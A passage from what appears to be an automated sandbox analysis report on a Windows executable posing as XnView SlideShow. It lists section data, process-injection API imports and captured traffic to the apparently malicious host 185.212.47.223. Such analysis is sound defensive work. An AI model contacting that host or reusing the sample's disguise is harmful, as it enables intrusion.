                                                                                                                                        .data20x830000x640x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                        .data0x840000x4b900x4c00False0.377312911184data5.59892910427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                        .data50x890000x640x200False0.02734375data0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                        .data40x8a0000x640x200False0.02734375data0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rsrc0x8b0000x85c0xa00False0.2828125data2.84495564837IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0x8c0000xc100xe00False0.720982142857data6.07506907753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                        RT_ICON0x8b1180x128GLS_BINARY_LSB_FIRSTFrenchFrance
                                                                                                                                        RT_ICON0x8b2400x2e8dataFrenchFrance
                                                                                                                                        RT_GROUP_ICON0x8b5280x22dataFrenchFrance
                                                                                                                                        RT_VERSION0x8b54c0x310dataFrenchFrance

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        KERNEL32.dllGetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, InterlockedCompareExchange, Sleep, InterlockedExchange, CreateFiber, DebugActiveProcess, Toolhelp32ReadProcessMemory, MapUserPhysicalPagesScatter, GetPrivateProfileSectionW, SetComputerNameExW, SetFileApisToOEM, GlobalGetAtomNameW, GetFullPathNameW, Heap32First, DeleteTimerQueueEx, ConvertDefaultLocale, SwitchToThread, GetLongPathNameW, EnumCalendarInfoExW, SetMailslotInfo, ReplaceFileW, GetDiskFreeSpaceW, GlobalWire, BuildCommDCBA, FindCloseChangeNotification, ReadConsoleOutputAttribute, WideCharToMultiByte, WaitForSingleObject, SetEvent, LoadResource, GetPrivateProfileIntA, GenerateConsoleCtrlEvent, OpenMutexA, CreateEventW, BeginUpdateResourceA, CallNamedPipeA, GetSystemDefaultLangID, TerminateJobObject, PeekNamedPipe, SetCommTimeouts, ReplaceFile, Heap32ListFirst, GetCurrentDirectoryA, GetACP, VirtualFree, VirtualAlloc, GetSystemInfo, GetVersion, VirtualQuery, SetCurrentDirectoryW, RemoveDirectoryW, MultiByteToWideChar, lstrlenW, lstrlenA, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLastError, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileW, CloseHandle, TlsSetValue, TlsGetValue, LocalAlloc, lstrcpyW, lstrcmpiW, lstrcmpA, WriteProcessMemory, WritePrivateProfileStringW, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualProtectEx, VirtualProtect, UnmapViewOfFile, TerminateThread, SystemTimeToFileTime, SuspendThread, SizeofResource, SignalObjectAndWait, SetThreadPriority, SetThreadLocale, SetThreadContext, SetThreadAffinityMask, SetPriorityClass, SetLastError, SetFileAttributesA, SetFileAttributesW, SetErrorMode, SetEnvironmentVariableW, ResumeThread, ResetEvent, RemoveDirectoryA, ReleaseMutex, ReadProcessMemory, QueryPerformanceFrequency, PulseEvent, OutputDebugStringW, OpenProcess, OpenFileMappingA, OpenFileMappingW, OpenEventA, MulDiv, MoveFileExW, MoveFileW, MapViewOfFile, LockResource, LocalSize, LocalFree, LoadLibraryExA, LoadLibraryA, LoadLibraryW, LeaveCriticalSection, IsBadReadPtr, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalMemoryStatus, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExA, GetVersionExW, GetUserDefaultLCID, GetTimeZoneInformation, GetThreadPriority, GetThreadContext, GetTempPathA, GetTempPathW, GetSystemTime, GetSystemDirectoryA, GetSystemDirectoryW, GetStartupInfoW, GetShortPathNameW, GetProcessVersion, GetPrivateProfileStringW, GetPrivateProfileIntW, GetPriorityClass, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetFileTime, GetFileAttributesA, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDateFormatW, GetCurrentThread, GetComputerNameA, GetComputerNameW, GetCommandLineA, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedDecrement, FormatMessageA, FormatMessageW, FlushViewOfFile, FlushInstructionCache, FindResourceA, FindResourceW, FindNextFileA, FindNextFileW, FindFirstFileA, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExpandEnvironmentStringsA, ExpandEnvironmentStringsW, EnumCalendarInfoW, EnterCriticalSection, DuplicateHandle, DeleteFileA, DeleteFileW, DeleteCriticalSection, CreateSemaphoreW, CreateRemoteThread, CreateProcessA, CreateProcessW, CreatePipe, CreateMutexA, CreateMutexW, CreateFileMappingA, CreateFileMappingW, CreateFileA, CreateEventA, CreateDirectoryA, CreateDirectoryW, CopyFileA, CopyFileW, CompareStringA, Beep, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, TzSpecificLocalTimeToSystemTime
                                                                                                                                        USER32.dllEnumDesktopWindows, SetForegroundWindow, EnumDesktopsA, SetUserObjectInformationA, CopyAcceleratorTableA, GetClassNameW, PeekMessageW, RegisterClassW, DdeAbandonTransaction, OemToCharBuffW, SetParent, DlgDirSelectExW, CreateDialogIndirectParamW, DdeClientTransaction, CopyRect, GetWindowTextLengthW, GetWindowModuleFileNameA, InSendMessage, EnumDisplaySettingsW, GetMonitorInfoA, InsertMenuA, SetDeskWallpaper, UnionRect, OpenDesktopA, GetKeyboardType, LoadStringW, MessageBoxA, CharNextW, CreateWindowExA, CreateWindowExW, wvsprintfW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextA, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetPropW, SetMenuItemInfoW, SetMenu, SetFocus, SetCursor, SetClipboardData, SetClassLongW, SetCapture, SetActiveWindow, SendMessageTimeoutA, SendMessageTimeoutW, SendMessageCallbackA, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropA, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassA, RedrawWindow, PostThreadMessageA, PostThreadMessageW, PostQuitMessage, PostMessageA, PostMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadKeyboardLayoutW, LoadImageA, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageA, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FlashWindow, FindWindowExA, FindWindowExW, FindWindowA, FindWindowW, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextA, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPointEx, CheckMenuItem, CharUpperBuffW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AttachThreadInput, CharLowerBuffA, CharUpperBuffA, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout, LoadIconA, GetMenuCheckMarkDimensions, IsCharUpperW, VkKeyScanW, GetListBoxInfo, IsGUIThread, PaintDesktop, VkKeyScanA, CloseWindow, GetDoubleClickTime, CharUpperW, GetMessageExtraInfo, OpenIcon, GetWindowContextHelpId, IsCharAlphaA, CharNextA, GetQueueStatus, IsCharLowerA, IsCharAlphaW, OemKeyScan, LoadCursorFromFileA, GetDlgCtrlID, GetProcessWindowStation, CharLowerA, GetThreadDesktop, WindowFromDC, GetClipboardSequenceNumber
                                                                                                                                        GDI32.dllUnrealizeObject, TextOutA, TextOutW, StretchDIBits, StretchBlt, StartPage, StartDocA, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextFaceA, GetTextExtentPointW, GetTextExtentPoint32A, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExcludeClipRect, EnumFontFamiliesExW, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateFontA, CreateFontW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, BitBlt, AbortPath, GetEnhMetaFileW, CreateMetaFileA, GetEnhMetaFileA, GetObjectType, SwapBuffers, FlattenPath, GetPolyFillMode, CloseFigure, GetBkColor, StrokePath, GetMapMode, GetDCBrushColor, UpdateColors, GetColorSpace, SetMetaRgn, EndPath, CloseMetaFile, GetPixelFormat, GetGraphicsMode, PathToRegion, GetStretchBltMode, CancelDC, CreatePatternBrush, DeleteColorSpace, GetTextCharset
                                                                                                                                        COMDLG32.dllPrintDlgW, GetSaveFileNameA, GetSaveFileNameW
                                                                                                                                        ADVAPI32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey, SetSecurityDescriptorDacl, RegSetValueExA, RegSetValueExW, RegQueryValueExA, RegOpenKeyExA, RegOpenKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueA, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExA, RegCreateKeyExW, OpenProcessToken, LookupPrivilegeValueW, LookupAccountSidW, LookupAccountNameW, InitializeSecurityDescriptor, GetUserNameA, GetUserNameW, GetTokenInformation, GetLengthSid, FreeSid, EqualSid, CopySid, AllocateAndInitializeSid, SetNamedSecurityInfoW, GetNamedSecurityInfoW, SetEntriesInAclW, ConvertStringSidToSidW, GetKernelObjectSecurity
                                                                                                                                        SHELL32.dllDragQueryFileW, SHGetFolderPathA, ExtractAssociatedIconA, SHFormatDrive, Shell_NotifyIconA, SHGetIconOverlayIndexA, SHCreateDirectoryExA, Shell_NotifyIconW, ShellExecuteExA, ShellExecuteExW, ShellExecuteA, ShellExecuteW, SHGetFileInfoA, SHGetFileInfoW, SHGetSpecialFolderPathW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetMalloc, SHGetPathFromIDListA, SHGetSettings
                                                                                                                                        ole32.dllCoTaskMemFree, StringFromCLSID, CoCreateGuid, CreateStreamOnHGlobal, OleUninitialize, OleInitialize, CoTaskMemAlloc, ProgIDFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID, GetHGlobalFromStream
                                                                                                                                        COMCTL32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                                                                                                        Version Infos

                                                                                                                                        DescriptionData
                                                                                                                                        LegalCopyrightCopyright 1991-2005 by Gougelet Pierre-e
                                                                                                                                        InternalNameXnView
                                                                                                                                        FileVersion2.13
                                                                                                                                        CompanyNameXnView, http://www.xnview.com
                                                                                                                                        LegalTrademarks(
                                                                                                                                        iew.ProductVersion
                                                                                                                                        3D
                                                                                                                                        FileDescriptionXnView SlideShow
                                                                                                                                        iginalFilename.ProductName
                                                                                                                                        Translation0x0409 0x04b0

                                                                                                                                        Possible Origin

                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                        FrenchFrance

                                                                                                                                        Network Behavior

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Nov 26, 2020 01:31:03.242841959 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.242901087 CET4976780192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.261367083 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.261416912 CET8049767185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.261558056 CET4976780192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.261671066 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.262625933 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.280951977 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.327694893 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.327727079 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.327744961 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.327768087 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.327815056 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.327832937 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.327863932 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.327892065 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.327898979 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.327996016 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.328022957 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.328041077 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.328109026 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.328141928 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.328164101 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.328177929 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.328211069 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.328279018 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.328326941 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.328339100 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.328342915 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.328485966 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.346416950 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346443892 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346457958 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346477032 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346498966 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346513987 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346544981 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.346575975 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.346581936 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.346674919 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346695900 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346709967 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346730947 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346755981 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346772909 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.346772909 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.346784115 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.346790075 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.346852064 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.346983910 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347007990 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347022057 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347093105 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347110987 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347135067 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347208023 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347222090 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347235918 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347404957 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347426891 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347440958 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347465992 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347493887 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347498894 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347512007 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347534895 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347548962 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347629070 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347664118 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347760916 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347798109 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347812891 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347831964 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347851992 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347866058 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.347897053 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347932100 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.347943068 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.365134954 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365175009 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365195990 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365222931 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365248919 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.365263939 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.365269899 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365295887 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365325928 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.365330935 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365333080 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.365375042 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365437984 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365474939 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365511894 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365530968 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.365549088 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365566015 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.365572929 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365575075 CET4976680192.168.2.4185.212.47.223
                                                                                                                                        Nov 26, 2020 01:31:03.365616083 CET8049766185.212.47.223192.168.2.4
                                                                                                                                        Nov 26, 2020 01:31:03.365653992 CET8049766185.212.47.223192.168.2.4

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Nov 26, 2020 01:29:59.963594913 CET6454953192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:29:59.979556084 CET53645498.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:02.946913004 CET6315353192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:02.962074995 CET53631538.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:04.071535110 CET5299153192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:04.087162971 CET53529918.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:05.181958914 CET5370053192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:05.197562933 CET53537008.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:06.139648914 CET5172653192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:06.155009031 CET53517268.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:06.909111977 CET5679453192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:06.924228907 CET53567948.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:07.540589094 CET5653453192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:07.555835962 CET53565348.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:08.680998087 CET5662753192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:08.696574926 CET53566278.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:11.603954077 CET5662153192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:11.619411945 CET53566218.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:12.398360968 CET6311653192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:12.413374901 CET53631168.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:13.200793982 CET6407853192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:13.216779947 CET53640788.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:14.214627981 CET6480153192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:14.229983091 CET53648018.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:14.906547070 CET6172153192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:14.922333002 CET53617218.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:15.702840090 CET5125553192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:15.717856884 CET53512558.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:18.221234083 CET6152253192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:18.248043060 CET53615228.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:20.530565023 CET5233753192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:20.563102007 CET53523378.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:20.580185890 CET5504653192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:20.613114119 CET53550468.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:20.623557091 CET4961253192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:20.639322042 CET53496128.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:22.319796085 CET4928553192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:22.335192919 CET53492858.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:38.024144888 CET5060153192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:38.054089069 CET53506018.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:38.460375071 CET6087553192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:38.497709036 CET53608758.8.8.8192.168.2.4
                                                                                                                                        Nov 26, 2020 01:30:39.063101053 CET5644853192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:39.083950996 CET5917253192.168.2.48.8.8.8
                                                                                                                                        Nov 26, 2020 01:30:39.096968889 CET53564488.8.8.8192.168.2.4
